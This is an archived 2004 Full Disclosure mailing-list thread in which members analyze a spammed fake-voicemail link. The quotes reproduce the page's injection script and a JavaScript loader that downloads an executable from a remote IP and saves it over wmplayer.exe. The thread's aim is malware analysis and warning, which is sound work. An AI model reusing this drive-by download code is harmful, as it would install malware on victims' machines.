Full Disclosure mailing list archives
Re: spamming trojan?
From: joe smith <joe () joesmith homeip net>
Date: Wed, 16 Jun 2004 13:25:19 -0500
I used PE Explorer. Looks the june4.exe is some kind of spyware. It reference to another site "cjdra.com", possibly uploading user information there. I just started learning assembly, please pardon my lack of knowledge on reverse engineering.
J Michael Gargiullo wrote:
On Wed, 2004-06-16 at 13:41, joe smith wrote:The file is UPX packed and withit the file there is another "GET" pointing to "http://219.234.95.124/june4.exe"JLike those Chinese stacking dolls... How'd you unpack it?Michael Gargiullo wrote:On Wed, 2004-06-16 at 08:23, Geo. wrote:Received a spam this morning claiming I have a voicemail with the link (warning do not click the link) http:-//www-1voicemailbox-net/voicemail/ (dashes added by me) which brings up a frames based page with one of the frames containing thisfunction InjectedDuringRedirection(){ showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialo gHeight:1\;dialogWidth:1\;").location="javascript:'<SCRIPT SRC=\\'http://219.234.95.124/vbox/shellscript_loader.js\\'><\/script>'"; Anyone want to try and analyze what this thing is? It was spammed to about 30 addresses here this morning. Geo.Here's the contents:var x = new ActiveXObject("Microsoft.XMLHTTP"); x.Open("GET", "http://219.234.95.124/vbox/w_e_d.exe",0); x.Send();var s = new ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; s.Open(); s.Write(x.responseBody); s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2); location.href = "mms://"; so whatever w_e_d.exe is... _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Antivirus/Trojan/Spyware scanners DoS!, (continued)
- Antivirus/Trojan/Spyware scanners DoS! bipin gautam (Jun 13)
- Re: Antivirus/Trojan/Spyware scanners DoS! Benjamin (Jun 13)
- Re: Antivirus/Trojan/Spyware scanners DoS! Syke (Jun 13)
- Re: Antivirus/Trojan/Spyware scanners DoS! npguy (Jun 13)
- Re: Antivirus/Trojan/Spyware scanners DoS! Benjamin (Jun 13)
- Re: Antivirus/Trojan/Spyware scanners DoS! evilninja (Jun 13)
- RE: Antivirus/Trojan/Spyware scanners DoS! Sean Crawford (Jun 13)
- RE: Antivirus/Trojan/Spyware scanners DoS! Aditya, ALD [Aditya Lalit Deshmukh] (Jun 13)
- Re: Antivirus/Trojan/Spyware scanners DoS! Cory Donnelly (Jun 15)
- spamming trojan? Geo. (Jun 16)
- Re: spamming trojan? Michael Gargiullo (Jun 16)
- Message not available
- Message not available
- Re: spamming trojan? joe smith (Jun 16)
- Re: spamming trojan? Michael Gargiullo (Jun 16)
- Re: spamming trojan? joe smith (Jun 16)
- Re: spamming trojan? Aditya, ALD [ Aditya Lalit Deshmukh ] (Jun 16)
- Re: spamming trojan? Aditya, ALD [ Aditya Lalit Deshmukh ] (Jun 17)
- Antivirus/Trojan/Spyware scanners DoS! bipin gautam (Jun 13)
- Re: spamming trojan? Paul Schmehl (Jun 16)
- RE: Antivirus/Trojan/Spyware scanners DoS! Geo. (Jun 16)
- Re: Antivirus/Trojan/Spyware scanners DoS! npguy (Jun 13)
- Re: Antivirus/Trojan/Spyware scanners DoS! bipin gautam (Jun 14)